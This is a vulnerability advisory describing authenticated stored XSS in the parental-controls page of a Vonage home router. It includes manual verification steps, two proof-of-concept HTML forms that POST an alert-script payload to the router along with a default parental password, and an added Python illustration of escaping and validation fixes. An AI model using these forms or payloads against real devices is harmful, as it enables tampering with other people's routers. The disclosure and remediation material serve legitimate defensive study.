Vonage Home Router (Stored XSS)

Credit Nu11By73



Overview

During an evaluation of the Vonage home phone router, several web-based vulnerabilities were identified. Vonage was contacted almost 18 months ago, and a response was received from what was stated to be their security department saying that these vulnerabilities would be fixed. To this date, the vulnerabilities still exist in the current versions of the software. The software and hardware versions this was tested against are listed below.

Device Description:
1 port residential gateway
Hardware Version:
VDV-23: 115
Original Software Version:
3.2.11-0.9.40

Exploitation Writeup

The exploitation process for this appliance was fairly trivial. The standard use of a word before the double quote was used as padding since only. This was because the software removed everything after the script tags, which also removed the ability to undo the change through the web UI without resetting the device. Two different parameters allowed the insertion of standard XSS test script tags. The parameters were found in the code for the /goform/RgParentalBasic page. The injectable parameters are NewDomain and NewKeyword; the verification steps taken are listed below.

Verification

NewKeyword Parameter:
1. Log in to the router
2. Click advanced setup
3. Click parental controls
4. In the block these keywords text box enter: test"><script>alert(1)</script>
5. Click the add keyword button to receive the pop up.




NewDomain Parameter:
1. Log in to the router
2. Click advanced setup
3. Click parental controls
4. In the block these websites text box enter: test"><script>alert(1)</script>
5. Click the add domain button to receive the pop up.




Proof of concept code:
The code below was used to exploit the application through a standard POST. It should be noted that the researcher had to be logged in to the device before exploitation could take place. Also, there was a mechanism in place involving the x and y parameters: these changed on every POST, so they were modified as needed to test the scripts.

NewDomain.html
<html>
<p>Authenticated Stored XSS - Vonage Modem</p>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" />
<input type="hidden" name="NewKeyword" value="" />
<input type="hidden" name="KeywordAction" value="0" />
<!-- The payload must be attribute-encoded here; a raw double quote would end the value attribute and the form would submit only "test" -->
<input type="hidden" name="NewDomain" value="test&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;" />
<input type="hidden" name="x" value="50" />
<input type="hidden" name="y" value="15" />
<input type="hidden" name="DomainAction" value="1" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Exploit" />
</form>
</html>


NewKeyword.html
<html>
<form method="POST" action="http://192.168.15.1/goform/RgParentalBasic">
<input type="hidden" name="RemoveContentRule" value="0" />
<input type="hidden" name="AddContentRule" value="0" />
<input type="hidden" name="ContentRules" value="0" />
<input type="hidden" name="RuleSelect" value="0" />
<!-- Same attribute-encoding as in NewDomain.html so the full test string reaches the device -->
<input type="hidden" name="NewKeyword" value="test&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;" />
<input type="hidden" name="x" value="61" />
<input type="hidden" name="y" value="12" />
<input type="hidden" name="KeywordAction" value="1" />
<input type="hidden" name="NewDomain" value="" />
<input type="hidden" name="DomainAction" value="0" />
<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Enable Service" />
</form>
</html>
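As an added illustration of the root cause and the fix (this is not code from the advisory or from the device firmware), the snippet below mimics the flawed rendering of a stored NewDomain/NewKeyword value, shows the same markup with attribute escaping applied, and adds server-side validators; the hostname pattern and the keyword policy are assumptions, not the router's real rules.

```python
import html
import re

# Constructed sample: the test string the advisory submitted in NewDomain / NewKeyword.
XSS_PAYLOAD = 'test"><script>alert(1)</script>'

# Assumed allowlist for a domain rule: DNS hostname labels only.
HOSTNAME_RE = re.compile(
    r'^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*'
    r'[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$', re.I)


def render_rule_vulnerable(value: str) -> str:
    """Mimics the flawed behaviour: the stored value is concatenated into the page unescaped."""
    return f'<input type="text" name="NewDomain" value="{value}" />'


def render_rule_safe(value: str) -> str:
    """Same markup, but the value is HTML-attribute-escaped before it is rendered."""
    return f'<input type="text" name="NewDomain" value="{html.escape(value, quote=True)}" />'


def validate_domain(value: str) -> bool:
    """Hypothetical server-side check for NewDomain: accept only a syntactically valid hostname."""
    return bool(HOSTNAME_RE.fullmatch(value.strip()))


def validate_keyword(value: str, max_len: int = 64) -> bool:
    """Hypothetical policy for NewKeyword: bounded length and no markup-significant characters."""
    return 0 < len(value) <= max_len and not any(c in value for c in '<>"\'&')


def breaks_out_of_attribute(rendered: str) -> bool:
    """Detection helper: a live <script> tag in the rendered markup means the attribute was escaped from."""
    return '<script>' in rendered.lower()
```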